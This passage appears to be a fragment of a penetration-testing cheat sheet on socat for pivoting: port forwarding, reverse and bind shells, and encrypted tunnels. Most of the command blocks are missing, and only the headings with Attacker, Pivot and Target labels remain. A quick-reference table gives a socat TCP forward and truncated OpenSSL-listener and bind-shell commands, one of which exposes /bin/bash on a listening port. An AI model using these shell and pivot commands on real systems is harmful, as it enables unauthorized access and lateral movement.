Install
Port Forward (TCP Redirect)
Forward traffic from one port to another host.PIVOT:8080 → reaches TARGET_IP:80.
Background
Reverse Shell Relay
Attacker — Listener
Pivot — Relay
Target — Connect
Port Forward Chain
Encrypted Tunnel (OpenSSL)
Generate Cert
Encrypted Listener
Encrypted Client
Bind Shell
Target
Attacker
Reverse Shell
Attacker
Target
UDP Forward
Quick Reference
| Task | Command |
|---|---|
| TCP forward | socat TCP-LISTEN:PORT,fork TCP:TARGET:PORT |
| Reverse relay | Listen on pivot, forward to attacker |
| Encrypted | socat OPENSSL-LISTEN:443,cert=socat.pem... |
| Bind shell | socat TCP-LISTEN:4444... EXEC:/bin/bash,pty... |